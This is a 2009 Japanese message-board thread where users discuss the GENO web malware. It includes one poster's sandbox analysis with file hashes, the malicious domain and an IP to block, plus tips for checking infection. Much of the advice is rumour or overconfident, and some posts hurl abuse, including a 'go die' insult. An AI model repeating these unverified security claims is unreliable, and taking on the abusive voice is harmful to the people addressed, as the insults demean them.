963 名前：GENO[sage] 投稿日：2009/05/17(日) 22:02:55 ID:uEd/QI2I0 (PC)
>>926
自分じゃないが、知人は、プロンプトもレジストリエディタも開いたけど、
sql〜は1300kbぐらいのヤバイサイズだったらしいから、そうかもしれん。

>>441
え、ν即民はSP1だろ・・・？
俺釣られちゃったかな？

>>438
Adobe Readerを起動→ヘルプ→製品向上でいい筈

>>439
重大なことなんだから、もっと前面に注意書き出しとくべきだと思うんだがな

adobeむかつくな相変わらず。。

>>445
たしかにわかりにくい

未だにドリームキャストでネットしている俺は勝ち組だな。
ウイルス？何それ？www

こんな騒ぎになってる割には某巨大インタネット掲示板は感染してないんだね

愛の妖精ぷりんてぃんが感染しとるぞｗｗ

>>450
あのおばちゃんじゃあ治せないんじゃねえかなｗ

感染してる同人サイトって、腐女子サイトがほとんどじゃねーの？

>>450

しかも21.8Mもある

愛生会病院も感染してるな

みんな感染サイトの主に感染のこと報告してる？

>>441
XP home SP3だけどGENO踏んでも大丈夫だった

最新版にアップグレードできないMeと98は座してゲノ待つしか無いのですか
そうなのですか
フラッシュ見ないとかpdf開かないとかそんなんじゃ駄目なんだよな
思いきって消すしかないかフラッシュプレイヤーとアクロバットリーダー
しかしカタカナで書くとより情弱が強調されるNE

401 192.168.0.774 [sage] 2009/05/17(日) 22:38:51 ID:N9SKEU4J0
　え〜、gnomeの人のおかげで挙動の予想がついてきたので、ちょっとexeの方を実行した時に
　作成されるファイルを仮想PCで確保してみました。
　ベンダーに提出するかどうかの判断は各自にお任せします。（一応、KasperskyとAVIRAには送ってあります。）

　muvl.exe　(元の名前 muvl.nug) - ランダム作成らしい。
　　MD5 : 3862b349b9b5c9283925e181ff9f5bf8
　　http://www.virustotal.com/jp/analisis/6ee378acae1dfede9be4c3949ee56b1a (2/40)

　sqlsodbc.chm - ただのダミーファイルです。（中身は無意味なテキストと空白）
　　MD5 : 34cd61d83853e511f0a28027f639a1c9
　　http://www.virustotal.com/jp/analisis/395c9f2d6d6d38525fb24b3722664bfa (0/40)

　muvl.exeは、中身に合わせて拡張子を変えてあります。（ベンダー提出時に捨てられないように）

　gnomeの人の所の話では、一定時間毎に自己書き換えをして潜伏するそうなので、シグネチャで
　対応できる可能性はかなり低そうですが、出さないよりはマシかもしれません。

　sqlsodbc.chmの方はダミーファイルなので、マルウェアではありません。
　感染すると、sqlsodbc.chmがこれに置き換えられるという意味で参考に添付してあります。
　ファイルサイズは1,323バイトで、オリジナルファイルと置き換えられます。

　あと、悪い話ですが、SymantecでもKasperskyでも、オンラインスキャンではコイツに感染していることがわかりません。
　バッチリ感染した仮想PCをオンラインスキャンしてみたのですが、どちらも何も検出しませんでした。

　このマルウェアは、感染時に元の実行ファイル（martuz.cnから落ちてくるxxxx.exe）の方を消去（証拠隠滅）
　するようになっているので、一度感染すると、本体の自己書き換えもあるので、検出はほぼ不可能と思われます。

　タチ悪すぎ．．．

GENO踏みまくったけど、いまんところ大丈夫な俺
火狐使用だったのが幸いしていたのか

>>458
ウィルスの方も面倒くさくて対応してない可能性がある

>>459
まるでＨＩＶだな

>>459
ひぇぇ
マジかよ。たち悪杉じゃねーか

このウイルス作った奴すごいな

>>459
感情がある人間が造ったと思えない！
鬼！悪魔！鬼畜ーーー！！

>>458
Meと98なんてもともと個人情報入れてネットに繋がないだろ
GENOじゃなくても情報除かれ放題じゃないの？

>>459
こりゃゲートになってるAdobeをなんとかするのが一番手堅いかもわからんねｗ
もうされてるんだけど。

仮に別の脆弱性を付いてくるようになったら手がつけられんぞｗ

>>200
それもだめなのか

自己書き換えしてセキュリティーソフトのパターンマッチング回避しているのか。
タチワルだな。

Adobe最新にして、firefoxにでもすりゃとりあえずはいいのか？
こえーよ

いや、NT5系が集団感染しているのを見ているとメシウマとさえ思えてくる。
我が家のPC7台中5台がXPなんだけどね。残り2台がVista。

有志が作って下さった
感染チェックツール
http://3rd.geocities.jp/tdnskbn/dat/genochecker.zip
機能
1 ) cmd.exeの起動確認
2 ) regedit.exeの起動確認
3 ) sqlsodbc.chmのファイルサイズ確認

ＺＩＰを解凍するとgeno.batが出て来るので、
それを実行すれば簡単に感染しているのかどうかチェックできる。
心配な人はgeno.batをメモ帳で開いてみれば安全なファイルだとわかります。

チェック後の起動画面。
http://www.rupan.net/uploader/download/1242563513.png

同人板のやつら必死すぎだろｗ
感染サイトのアド書き込んだだけで逮捕だとよｗｗｗｗ

>>446
たぶん、ウィルス作ったやつもむかついてたんだろうｗ

このウィルス作った奴は忍者だろ

>>459
これマジならヤバイぞ・・・

とりあえずメインPCがVistaだからUACオンにしたわ
UAC入れると他PCとのファイル共有がめんどいんだよなあ
あーあ

Sumatra PDFの俺には関係ないぜ！

自己書き換えのパターンが周期的ならマダ対応の仕方もあるだろうけどそこらへんどうなんだろ

>>477
ノートンuac使えば？

>>461
いやそんなadobeの脆弱性にOSの新旧は
VistaがとにかくUAC（だっけ）でガードされてるってだけではないのか
アクロバットリーダーなんか5だった、もう泣くしか無い
当然ヘルプ開いてもアップデートへのリンクなんか無いっていう
>>466
そんなもんなのか。じゃあ今更騒いでも仕方ないのかな。でも
クレカとかネットバンクとか使ってないから覗かれても住所氏名位なのは
変わらないとしても、サイト持ってるから改竄されるのが今回は恐ろしい
FTPじゃなくてファイルマネージャ使ったら大丈夫なんだろうか

UACより、そもそも管理者権限で使うなよ
管理者権限はアプリのインストールとかシステムいじるときだけにして、
普段は一般ユーザーで使え

自己書き換えで姿が変わるんならGENO（ギニュー）ウィルスと名づけよう

今回の件とは関係無いけど
同人板って、板自体が慢性的にウィルスか何かの被害にあってるみたいな
書き込みをよく見掛けるんだけど、
あれって本当なんかな。
本当なら運営が放置してるってのがよく分からん

>>480
ノートン製品には意地でも頼らないジャスティス

なぜvista付属のUACがそこまで忌み嫌われるのか

>>482
同意　そこにパスつきしたら最強

幼女ウイルスに感染した

ttp://jssdf.org/u/img-box/img20090517180626.jpg
ttp://jssdf.org/u/img-box/img20090517180700.jpg
ttp://jssdf.org/u/img-box/img20090517180736.jpg
ttp://jssdf.org/u/img-box/img20090517180800.jpg

やばい
ヴぃすた欲しくなってきた

>>486
あんなものを有難がっている方がおかしいはｗｗｗ

まぁ「踏んだけどなんともならなかった」と言うXP厨には
あとできっついお仕置きな請求書とか届いたりすんですかねぇｗ？

>>482
いまの環境をそのまま使う場合、
まず管理者アカウントをもう一つ作って、それから、現在の管理者アカウントを一般に落とせばいいの？

これってXP厨ならpdfとswfの関連付けを外しておくだけでいいんじゃないの？

VistaのUACはウザイけど、やはり守りは堅かった

>>491
それでいいんじゃね？

>>425
汗水流し働いてゲットした金が奪われる可能性UP
PCブルースクリーンで起動不可
竹島にテレポート
金正男が北朝鮮の後継者になる

UACがあるから感染しないわけじゃねえだろｗｗ
情弱乙

UACは鬱陶しいけどちゃんと警告すべきものを警告してくれてるからそんな悪い機能じゃない

現在のセキュリティーソフトはぶっちゃけて言えば特定されたウイルスの型を
照合してする方法だから、
一定時間ごとに型が変わる奴を検出するのは難しいよな。
殆どの奴が無力化されている状態だろ。

いろいろ踏んできたけどXP＆IE8じゃなんともないな

>>489
なんで？MacやLinuxだってUACあるだろ
あれが標準になるんだけど
うっとおしくもないし

>>496
こんな情弱みたことねーわｗ

???????? ??? ??????? ?? ????? ????????? ??????? ?? ???? ??? ?????
????????? ???? ????????? ??? ??????? ?????? ?? ??????? ? ??? ?????? ????? ???? ?????? ??? ???? ????????? ??????.
??????? ????? ?????? ????? ???? ? ???? ?????? ?????????.

chromeは砂箱で安全なんでしょ？

Vista厨が必死なｽﾚになってる

水際で防ぐしかないってどんだけインフルなんだよ。

adobe重い…更新出来ね…ｲﾗｲﾗ

>>505
隔離できないからインフル以上だな

ネットの情報を鵜呑みにしないで素直にVista買ってよかった
定員さんありがとう

火狐でも無理なのか？

もうAdobeのうちｲﾝｽｺされてるものを最新版にしてあとはへんなもの踏まないことを祈るしかないな

ていうかどこのベンダもまだ対応してないわけ？
むしろ気づいてなかったり？

今一番必死なのはvistaを道連れに出来なかったＸＰ厨だと思うがｗ

>>459
ひでえｗｗｗｗｗここまでとはｗ

成美堂って英語の構文150のとこか

つかVistaなんて入れてる物好き厨は普通にXP何台か持ってるから

>>459
だれかこれ噛み砕いて説明してくれませんか

>>515
ウイルス駆除ソフトはウイルスの型をデータと照合して消すけど
こいつはその型をめまぐるしく変えて尻尾をつかませないってこと

>>485
フリーツールだよ。試作段階の。
便利なツールは使わなきゃ損。

なんともはや

まるでHIVだな
たちが悪い

>>459
つまりsqlsodbc.chmが改変されてきゃ大丈夫なんだな？

VistaはセキュアOS
セキュアOS（Secure OS）とは、セキュリティを強化したオペレーティングシステムのことである。
厳密な定義は存在していないが、強制アクセス制御(Mandatory Access Control:MAC)機能及び、
最小特権を実現する機能を備えたものをそう呼ぶことが一般的である。
UACは、強制アクセス制御でかつ、最小特権を実現する
これを嫌がってるのは情弱のそしりを免れない

ちなみにユーザーアカウントでも、必要なときにはUACで管理者モードに昇格できるので、
普段はユーザーアカウントで使用するのが正しい使い方
しかし普段から管理者アカウントで使っても、UACが強制アクセス制御と最小特権を実現する不思議
これはUNIXやLinux以上の高機能である

ここまで手の込んだウィルス作る意図って…

犯人捕まってもIT各社から高待遇で迎えられるんだろーな
マフィアのPCぶっ壊して私刑にあえばいいのに

公明党ブラウザは大丈夫ですか

>>515
かいせんきってくびつってしね

>>459
sqlsodbc.chm - ただのダミーファイルです。（中身は無意味なテキストと空白）
　sqlsodbc.chmの方はダミーファイルなので、マルウェアではありません。
　感染すると、sqlsodbc.chmがこれに置き換えられるという意味で参考に添付してあります。
　ファイルサイズは1,323バイトで、オリジナルファイルと置き換えられます。

ってことは、ダミーファイルのsqlsodbc.chmが、正規のオリジナルファイルと同じファイルサイズにされたら、
>>472のファイルサイズ確認は使えないのね？

>>526
ハッシュ値

>>520
VistaならWindows\Help\mui\その下に0409、0411の2つのフォルダがあるけど、
要はデータソースウィザードのヘルプファイル。正常にオープンできればOKと認識している。

>>515
ボディーチェーンジ！の使いすぎで本来の姿を忘れてしまった

f639afde02547603a3d3930ee4bf8c12

上が正規ファイルのハッシュ
これがあってれば大丈夫

>>99
GENO感染乙

>>526
ダミーファイルって良く解らないけど
今はたまたまsqlsodbc.chmだけど
他のファイルに変更されたらそれだけ監視しててもダメだよな
ウィルスの挙動に関係ないならそのファイル書き換える必要ないような気がするけど
これはどういうこった

なんだかエライこと起きてたんだな
情弱でアホな俺にはこういう会話は尊敬する

wikiで見たら一応感染してないみたいだから後は祈るしかない

とりあえず怪しいところは見なきゃいいんですよね 先生

そもそもsqlsodbc.chmを書きかたら意図は何なのか

おいお前ら正直に答えてくれ
飽きてきただろ

sqlsodbc.chm のファイルサイズ49.5KBってなってるけど大丈夫だよね？

433 名前：401[sage] 投稿日：2009/05/17(日) 23:26:41 ID:N9SKEU4J0
>>416
嫌なことに、特に異変がない。　cmd.exeも普通に実行できるし、レジストリエディタも問題なく実行できる。
少なくとも、現在配布されているバージョンのウイルスについては、cmd.exe，レジストリエディタによる確認は不可能。
確認は、sqlsodbc.exeだけが頼りですね。

あと、動作が重くなったり、おかしくなった感じも特にない。仮想PCで重さの変化を感じないのだから、
実機ならまず気が付かんでしょう。


これ、今出回っているヤツだと、確実に感染したことに気がつかんと思う。　同人板その他、パンデミック状態になったの理解できるわ。

2chに引きこもって対応待ち

マジレスほしかったが今んとこ問題ないし寝るか…

>>536
ダブルクリックして開ければOKだと思う。ウィルスの踏み台にされた後には意味ないものになってるはずだから。

潜伏期間ってないの？

時限式とか恐い想定するなよ・・・

>>539
感染しているかどうかどうやってチェックした?
今はやっているウイルスはcmdもレジも開けるだよ。
sqlsodbc.chmの変化しか感染したかどうか分からない。

>>532
sqlsodbc.chmという明確な診断方法を予め周知させておいて、
ある日sqlsodbc.chmへの書き換えを行わない亜種を流して混乱させる…とか
とは言っても、sqlsodbc.chmが変わらない例は既にあるんだよな

亜種にしろなんにしろアドビの脆弱性狙ったものなら
アップグレードするなりアンインスコしとけば平気ですか？

>>536
sqlsodbc.chmのCRC32、MD5、SHA1を比べてみる

感染確認と各アップデートを済まして
後は危険IPのブロックとやらをするだけなんだが
BBR-4HGのIPフィルタルールの設定方がよく分からんのでパス。。

まあ、情弱の俺でも最低限の事はやったから
騒動が収束するまでは外出は控え専ブラで2ｃｈに引きこもるか。

>>543
俺が感染した奴はsqlsodbc.chmも変わらなかった

>>537の訂正


435 名前：401[sage] 投稿日：2009/05/17(日) 23:28:50 ID:N9SKEU4J0
>>433
>確認は、sqlsodbc.exeだけが頼りですね。

exeじゃねえ．．． sqlsodbc.chm　ですな。

ちょっとまてよ、FLASHを最新にするって事はPLAYER10かよ、9じゃなくて。

これはFLASH10の普及が遅れてるADBEOの陰謀だな

>>515
簡単に言うと、大抵のウイルス対策ソフトだと
パターンファイルを頻繁に更新しないと発見できないから困ったね
ということだ。

>>522
この結果をベースに、もっと発見されづらいトロイを
仕込んでボッとネットワークの作成って事じゃないかな。

とりあえず思いっきり感染してるんだが
専ブラのdatとかもアウトになってるものなのか？

バックアップ取ってねえよぉ

>>536
右クリプロパティやってみたら解決するよ

てか、いまだにFTPでサーバにアクセスしてるヤツ自体の存在がダメじゃないの？
SFTPとかSSH使えよ。

>>544
それどうやって感染確認できるんだ？ｗ

>>537
これ本当にXP終了なんじゃないか？

ていうかなんで無意味にファイルを書き換えるんだろうな
そのファイルに自己書き換えのキーがおかれてるとかじゃないの？

>>458
Avast!があるじゃないか

四月末にSalityで散々酷い目に遭った次はこれか・・・
恐ろしくてマトモにネットできんなｗ

adobe readerをアンインストールする手はあり？

コンパイル済み HTML ヘルプ ファイル
49.5 KB (50,727 バイト)
44.0 KB (45,056 バイト)

なんかＭＳの陰謀の気がしてきた

この騒動はXP切り捨てるための陰謀だったんだよ！

>>548
GENOウイルススレ
http://pc11.2ch.net/test/read.cgi/internet/1242450264/
このスレの401さんに
自分が感染しなかったことを報告してみて。
それで、本当に感染しなかったかどうか分かるから。

２ちゃんとニコニコが見れれば感染してもいいじゃん

>>555
SFTPは普通に使うなら良いんだけど、１サーバに200ユーザとか入れてる
ホスティングサービスとかだと、数十人が同時に使うとCPUへの負荷が
結構な物になるので、未だにFTPしか用意していないサーバって結構あるんだよ。

個人や趣味ならまだしも、企業とかでそういうサーバを使っているってのは
問題だとは思うんだが。

>>559
Avastすり抜けてくる奴もいるってさ…

f639afde02547603a3d3930ee4bf8c12だった

怖くてオナネタすら探せない

例外はあるが、大雑把にまとめると

XPを使用
↓
IE6か7を使用
↓
AdobeFlashPlayer、AdobePｄｆReaderのverが古い

これが確実に感染するPC
それ以外でも感染しないとは言えないけどね、ってのが現状
亜種祭りにならなければ（もうなってるかｗ）、ニュー速民には脅威ではない

>>568
もうadobe消そうかな・・・

このスレ見てたらどのサイトも怖くて見れないでござる

エロサイトでネタ漁るの自重しよう

情弱ですまんが、>>459のファイルサイズとばっちり一致しちまったんだけど、クリーンインストールすればもうそれでいいんだよな！？
ちなみに家のＸＰはネットの接続がとにかく悪くてアップデートさえしてもらえない・・・インストールもウイルススキャンもできない始末

UACで動作防げるマルウェアなんていくらでもあるし陰謀とかあり得んだろｗ

>>568
アバストは８割ぐらい検出とか書いてたな
赤傘はまだかな
>>569
おめでとう

ttp://www.seibidoshuppan.co.jp/
思いっきりコレを踏んだわけだが
sqlsodbc.chmのファイルサイズには変化はみられないし大丈夫か？
コマンドプロンプトもレジストリエディタも起動できた

>>568
もうそれ亜種じゃない新種

FlashPlayerてんこ盛りのサイトは氏ねってことだね。

まぁそれはともかくバージョンアップをなんてまともにやっていない端末が
多いだろうからどう考えてもオワタだろ。ましてやOSのサービスパックすら
満足に当ててない端末とかも普通にあるだろうしな。

>>572
うちもAvastが今日1回ブロックしてるし。怖くてWEB見れねぇよ。。

>>575
2行目も症状なんじゃね？さっさと再インスコしる

まとめサイト消えてない？

>>>579
まぁそんなPCはGENOウィルスに関わらず古典的なウィルスに感染しまくってるよね

>>577
亜種だと発見できない可能性がある。クリーンインスコ推奨かも…。（ ´･ω･)

企業のPCとかもいっぱい感染してそうだ…

Windows vista
　　C:\WINDOWS\Help\mui\0411\sqlsodbc.chm　のサイズが50,727 bytesなら安全

亜種だと無駄みたいだが

ウィルス作った奴の就職活動手伝わされただけなんじゃね？
感染しても他のファイルには特段異常無し（クリーンインストールしなければならないとはいえ）
「実害が無い（？）が厄介なウィルス作りました、てへ」みたいな

XPもWindowsUpdateでUACを導入してくれないの？

>>579
SPはむやみやたらに導入すると逆に駄目だと聞いたことがあるけど？

>>568
okwwww

うっかりクリック防止用にも疑わしいアドレスはhだけじゃなく
ttpまで削って欲しい

avastでとりあえず第一次防疫
adobe readerを入れないこと・flashを最新版にすることで第二次防疫
ルータで94.247.2.195とのパケット送受信を拒否で第三次防疫
できるならユーザ権限を管理者から一般に移して最終防疫
IE8・operaとかは予備
って感じか

とりあえず最後の権限だけどうするかだな・・・
ｲﾝｽｺのたびにユーザ切り替えはなぁ・・・

>>584
>571の環境で即思いついたのが、お前らの嫌いなあそこの本社なんだが。
珍しく赤字って報道されてた、あそこ。

>>584
明日からは更にヤバそうね

>>584
流行ったのが週末だったのは、まだ救いがあるかも。
平日だったらもっと感染サイトが広がっているだろう。

>>584
個人はPdfなんか無くても良いけど、企業は必須だからなｗ
個人向けPCに、アドベなんかをプレインスコしてたのが悪いと思うぞ

Vistaだから大丈夫とか言う奴もいるみたいだけど、
すり抜けする亜種が出てくる可能性が高いぞ。

月曜日からCO..JPとか.JPとかの企業ドメインが危ないな
どっか大きな会社がやられてニュースになってやっと周知かな

>>591
そこでVistaですよ

>>592
Tブーえす？

>>596
UACすり抜けたらMSが発狂するなｗ

Acroreaderは軽いからってずっと7.0にしてたのに
釣られて9にしてみちゃいました

ver7.0でアップデートめんどいから、とりあえずアンインスコした。

>>596
まじか、怖いな
ビスタの俺も安心するのはまだ早かったか

こんだけ2chでは騒がれてるのに、普通のニュースでは全然取り上げもされないよな
PC詳しくない一般人や情弱とかどうするんだよこれ

　　　　　　　　　 ／） 　　　　　　　　　
　　　　　　　　　　　／／／） 　
　　　　　　　　　 ／,.=ﾞ''"／ 　　　　　　　　　
　　　／　　　　 i f　,.r='"-‐'つ＿＿＿_　　　キャッシュ消せばいいんだよ！
　　/　　　　　 /　　　_,.-‐'~／⌒　　⌒＼
　　　　／　 　,i　　　,二ﾆ⊃（ ●）.　（●）＼
　　　/　 　　ﾉ　　　 ilﾞフ::::::⌒（__人__）⌒::::: ＼
　　　　　　,ｲ｢ﾄ､　　,!,!|　　　　　|r┬-|　　　　　|
　　　　　/　iﾄヾヽ_/ｨ"＼ 　　 　 `ー'´ 　 　 ／

>>596
昨日vistaでも感染確認とかあったけどデマだったんだ

>>602
俺も

>>604
企業側としちゃ自社HPが攻撃サイトになってるなんて眼を背けたい事実だしな

>>599
…ソコとも関係深いところ。んで日テレに近いとこ。
これで分かるな？ｗ

マカフィー早く対応してやんなよ死んじゃうぞ。

>>596
XP厨が息を吹き返す…！

まとめサイト繋がらないんだが・・

>>592
トヨタかキャノンか？

>>606
UAC切ってたんじゃねーの？

UACはすり抜けは無理
すり抜けたらMSが黙ってないから

>>571
XP、IE6、FlashPlayer9、AdobePｄｆReader5
だけど今のところ掛かってなかった

>>609
はっきり書いてよ
感染サイト知らずに踏む人出てきちゃうジャン

Avast!にしたらWebシールドのためにブラウザのプロクシ設定を
アドレス　localhost
ポート　12080

にしておくこと

>>595
ソフトのマヌアルとか最近はpdfが多いから入れるしかない。
バス会社のWebで見られる時刻表もAcrobatで作っているところがボチボチあるしな。

Adobeつかわねーから
アンインスコしてやった

>>605
GENOの中の人は死ね

ホームページをみていたら突然UACの確認画面が出てきて何割がはいを押さないかだけど
そんなに期待していいのか？

>>575
あのファイルがわずか1kbと言うことは考えられないな。開いてみて意味不明だったらアウト確定

で、結局これ感染すると何がどうまずいの？
一般人でウィルス知識ない俺にｋｗｓｋ

ブラスター以来の騒ぎになるの？

>>598
借り物PCがVistaだったけどいまいちUACがどんなものかわからんのだが

とりあえずメイン垢を制限ユーザにした
管理者垢作って10桁ｵｰﾊﾞｰのパスつけた

これでいいのかねぇ

キャッシュをクリアしてください（ｷﾘッ

UACすり抜けるとかちょっと考えにくいけど
そんな可能性考えてたら切りないぞｗ
仮想化ソフトのバグで環境内から漏れるとかいうのあったけどなｗ
とりあえずhipsとUAC併用で大抵防げると思う
>>606
警告の意味解らずぽんぽんクリックしてたりとか
UAC切ってたりとかしたら感染あり得る

ひとまず感染していないことはわかったけどAdobe Readerが最新版じゃないから今から最新版にしたほうがいい？
それともアンインスコしたほうがいい？
Adobe ReaderとAdobe Acrobat Readerって違うんだね

ブラスターがフリーザ級だとしたら
GENOウィルスはどれくらい？

月曜の朝から真のパンデミックが始まるのか…

トンフルとGENOの二穴攻め・・・
もういくしかねえな・・・

sqlsodbc.chmのサイズで感染かどうか判別してたけど
亜種は無理なんだって？

ハッシュで判断すればいいんじゃないの？

>>593
XPをメインで利用していたのがあだになったよな

>>616
サイトは大丈夫だよ多分。

ただ、社員数がパネェから保守連中が死ぬだろうなｗ

会社のPCとか勝手にフリーソフトとかインスコ出来ねーからな
デフォルトであどべ製品インスコされてるわ

こりゃ知らずに感染しちまうかも試練

>>614
作った奴らなら簡単にその無理をこじ開けちゃいそうな気がする。
まぁ完璧なんてのはないよ。あったらアンチウィルスソフトやスパイウェアなんていらないしな。

ところで、サイト→個人への感染はまあ何時もの手口だけど
サイトへの感染源はどうなってるの？管理者のPCがやられた？この広がりだと考え難いけど
感染者が閲覧しただけで広まるってことはないだろうし・・・

たな「Webウイルス」が猛威、感染被害が急増 英ソフォスが報告、正規サイトでもWebアクセスで被害の恐れ
//itpro.nikkeibp.co.jp/article/NEWS/20090515/330053/
このウイルスをWebページに埋め込む。
そのページにユーザーがアクセスすると、埋め込まれたウイルスが動き出し
別のウイルスを勝手にインストールされる恐れなどがある。

通販サイトやウェブメール等、WEBブラウザを介したWEBサービスで利用する
IDやパスワード、クレジットカード情報等の個人情報が抜かれる可能性もあります。
サイト管理人は自サイトのソースを見ることで書き換えを確認することができます。

>623

>>632
いつまでもsqlsodbc.chmを改竄し続けてるとも限らないよ
もう既に違うファイルの改竄に切り替えてる可能性もある

>>596
UACを突破してWindowsフォルダ内を弄られるなことがあればそれは重大な欠陥となるな

>>628
使わないなら削除で

>>639
次々と転移する癌みたいだな

>>64UACというがPCのパスがわかったらUACは突破できるよ

Windows NTには詳しくないんだけど
ドメイン参加していて制限かけていれば
システム絡みってユーザ権限じゃ変更出来ないんだよね？

でないと、感染したサイトが何らかの対応を今夜中にしてくれないと
明日から関連会社が大変なことになるんだが。

PDFとFLVって半分ウィルスインストーラと化してるよなあ

Adobe社内でスクリプトエンジン開発してる奴ら無能すぎる

>>609
23Fとか隣のビルの5Fとかはマクばっかだぞ

XPメインユーザが狙い打ちって本家の陰謀？
Vista買ってただちに７に乗り換えて金落としまくれよってこと？

>628
使わないなら削除
使うならAdobe reader 9.1.1とか最新のにアップデート

情弱だからしばらくネットで遊ぶ気になれないぜ・・・

adobeの脆弱性のせいで感染してるってことでいいの？
それならばadobe製品を全力で消すが

陰謀なわけないし
だいたい、陰謀かどうかなんて関係ないだろ

>>641
>>648
たまに使うからとりあえず最新版にしておくかな・・・

明日から会社マジやべぇな。
ｐｄｆファイルばっかりだから使わないわけにもいかんし…

>>645
MSエクセルが必死こいてマクロを無効化したってのにな
結局、マクロの時みたいに実行時にスクリプトを実行しますがよろしいですか？って聞くようにするしかないのか

市況板の住人とか　感染多そうな感じするがな・・

株やってると　PDF読める環境は必須だし・・・

でも、企業のPCなんてXPばかりだし、Adobe Readerなんか更新欠けていない奴がほとんどだし
本格的にやばいんじゃね？

>>643
ねーよｗ

ハッシュ値も見たけど変化無し、クリーンインスコめんどくせ
　　　　　　　　*'``・* 。
　　　　　　　　|　　　　 `*。
　　　　 　　,｡∩　　　　 　* 　　　もうどうにでもな〜れ
　　　　　　+　(´･ω･`)　*｡+ﾟ
　　　　　　`*｡ ヽ、　 つ *ﾟ*
　　　　　　　`・+｡*・' ﾟ⊃ +ﾟ
　　　　　　　☆　　 ∪~ ｡*ﾟ
　 　　　　　　`・+｡*・ ﾟ

>>656
管理者「ネットしないでください」

>>646
へーそうなんだ。隣5Fはいいとして、23Fって何の部署んとこだろ…？

と、>644辺りがもうそこの関係者とかに見えてくるんだがｗ
でも、ドメイン＆ユーザー権限で管理してる所も多いだろう品

ああ、ここ見てたら
実家の親と兄弟のPCが心配になってきたわ…

情弱揃いだからなあ

デスクトップのキャプとマイドキュメントとkakikomi.txt流出させる亜種作られないかなｗ

うちの会社大丈夫かしら

>653
こわければ
編集 環境設定から
adobe javascriptを使用のチェックを外す

>>661
一般人なだけだろ

もし会社のPCで感染したらどんな不都合がある？
重要なデータが入ってるPCならクビになったりするかな？

ちょっと、そこらじゅうの会社のPCが麻痺したら不況が加速すんじゃん
すごいなウィルスｗｗ

サイトに感染って一体何なんだおおん

MSBlastは笑った
月に2,3度しか使わない妹のPCも、会社のデータ参照するだけの同僚のノートも感染とか

adobe readerはアップデートしたがflash playerってなんだ

>>667
そこで儲かることをすれば
君も立派なビジネスマン

自称情報強者のXP厨さん達ならこんなの屁でもないだろ

怪しい情報を送受信してる
弾かなきゃならんIPは増え続けてるんだよな

どこかに一覧があると良いんだが
ああ、実家のルーター設定に飛んで行きてえ…

>639
まぁしばらく巡回しないのとcmdの起動とハッシュ値はみておくけど
面倒クサイ亜種だなぁ、ったく・・・

正常な状態のやつね
sqlsodbc.chm
ファイルサイズ：50,727バイト
CRC32：B61C7A80
MD5：F639AFDE02547603A3D3930EE4BF8C12
SHA-1：FBDD32ED13D27E4102621E1067FDF3634F33B2C3

avastなら安心なの？

>>669
ケーブル繋いでるだけで感染してたな

>>666
あれ？過去ログに首になった人の書込みがあったはず・・・
会社のＰＣでいろんなもの落としててそれ全部上司に見られたって
上に不具合報告する前にこのスレ見とけばよかったって泣いてたよ

ハッシュ値ってどうやってみるんだろ
ぐぐるの面倒だから教えてくれ

亜種亜種言われてるけど具体例出てなくね？

>>675
検出の可能性が「ある」ってレベル。駆除までできる対策ソフトは現状存在しない。
つか、現状ウイルスの動作を完全に把握できてる情報源が無い。
だからこそ、システムの再インスコしかないって言われてる。

>>666
その感染したマシンでFTP使用すると、IDとパスワード流出。
接続にID、PASSWD以外の制限が掛かっていないと
漏れたIDとPASSWDを使用しているサーバの中身を
全部チェックする羽目になる。

亜種とかで、そのクライアントからサーバのデータ書き換えまで
するようになったら、IP制限をかけてるサーバでも
感染元に早変わり。マジ勘弁してくれ。

>>666
クビにはならんが、おまえと上司には減給なり戒告なりの処分はあるだろう

>>669
Meたん大勝利だったやつだっけか

会社のパソコンに関しては出社前に上司に経緯知らせて、自分が使うPCは速攻アプデトするしかなく音

>>673
そのためのリモートアシスタント機能じゃないか。

>>675
あくまでひとまずは、だろ

なんかね、管理者から制限ユーザに切り替えたらいろいろ違うとこ出てきて違和感バリバリだから戻した・・・
最新版への以降・FoxitもJavascript禁止・avastのwebスキャナーONですり抜けられたらもう諦めるわ・・・

>>666
そのレス番はなんかのフラグか

出版社のホムペだと一瞬.cnチラっと見えたがなんともない
入ってるFlashのバージョンがウイルシを寄せ付けないんだろう
PDFはFoxitでJS関連のコンポーネントは入れてないのでおｋだろう

ダミアンｗ

>>679
出し様が無いと思う。
強いて挙げるなら、regedit, cmdが起動可能な亜種が出てる。
後は埋め込まれるJSにChromeが追加されてる。

核となるファイルもランダム生成されてて、感染してるか否かも判断し難い。
殆どのウイルスベンダが対応出来て無い現状。

俺は情弱なんだと思い知らされた
>>29を信じてやったら
ネットに接続できなくなった＼(^o^)／

こいつの文章コピペしてたからなんとかなったけど
危うくリカバリってレベルだ
結局俺はお前らに搾取される存在なんだな

というかだなブラウザもかえとけと
IE系はファイルをOFficeで流用してる可能性があるから

vistaは大丈夫って聞いたけどどゆこと？
教えてエロい人

>>691

すごいウイルスが出てきたもんだな

>>686
そこまでやって感染したらそれはもう新種

940 名前： ミツマタ(東京都)[] 投稿日：2009/04/06(月) 18:04:22.10 ID:AhXwTJEf
ID:8fz7e8f5 ですが自宅のPCから書き込み
自主退社という形になりました
逝ってきます
このウイルスが世界中に広がりますように

外に出れば新型インフルの猛威、仮想世界に飛び込んだらGENOウイルスの恐怖。
無職引きこもりはどうすればいいの？

>>692
プルニが一番使いやすい。Operaとか火狐は使いにくくて涙目なんだよな。

本当にPC版のエイズウイルスみたいだな
どれほどの悪意がこれを生み出したのか

>678
「右クリック　ハッシュ」で検索するか
HashTabってソフトを入れると良いよ

右クリック→プロパティでハッシュ値が見れるようになる
ttp://pai.no.land.to/up/src/dgz9140.jpg

>>686
制限ユーザのほうが何かと安心だぞ

>>691
真の情弱の俺は見ない弄らない触らないだ
まとめサイトも怖いから見ないぜ

sqlsodbc.chmについて

キーロガーのログ部分だね。おいらが見たのは反対からセーブしているやつだった。たとえば
あいうえお
は
おえういあ

らしい。つまり
感染しててまだFTP使用してないとsqlsodbc.chmはデフォのままで
感染確認としては弱いかもね
時既に遅しの場合のみ確認が出来るって感じかな

>>699
数日したらOperaか火狐は手放せなくなる存在だから
この機会に乗り換えとけ

>>700
「お金欲しい」っていう比較的単純な欲望だと思われ。
ダシにされるこちらはたまったものじゃないが。

ハッシュ値とかMD5ってなんだ。わからん
プロパティにそんなもんねーぞ

もうネットは大学のパソコンからしかやらぬ

225時価総額上位の企業サイトが感染したらIR経由で凄いことにならないかな
100%Reader使ってあるから

>>707
ググれカス

10 名前： ヒマラヤユキノシタ(コネチカット州)[] 投稿日：2009/04/06(月) 10:04:30.21 ID:8fz7e8f5
GENOよりも短縮貼った奴が許せない

